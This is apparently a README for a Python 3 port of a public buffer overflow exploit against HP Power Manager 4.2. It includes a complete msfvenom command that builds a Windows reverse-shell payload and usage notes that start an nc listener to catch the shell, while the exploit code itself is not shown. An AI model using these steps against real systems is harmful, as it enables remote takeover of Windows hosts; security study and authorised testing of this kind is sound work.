Since the official support for python2 is coming to an end and i am trying to improve my python3 skills and my understanding of exploits, i ported the well known HP Power Manager 4.2 'formExportDataLogs' Buffer Overflow exploit from python2 to python3. Please review the original python2 code by Muhammad Haidari on his github page. https://github.com/Muhammd/HP-Power-Manager
Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
setup
run msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' x86/alpha_mixed --platform windows -f c
to create the payload for a reverseshell. Then replace the payload at line 39 with your payload.
Usage: python3 hpm_exploit_p3.py : ip address the HP Power Manager is running on : port the application is running on : local port your shellcode is connecting back to -> script starts nc listener to catch reverse shell
This project is made for educational and ethical testing purposes only. It is the end user's responsibility to obey all applicable laws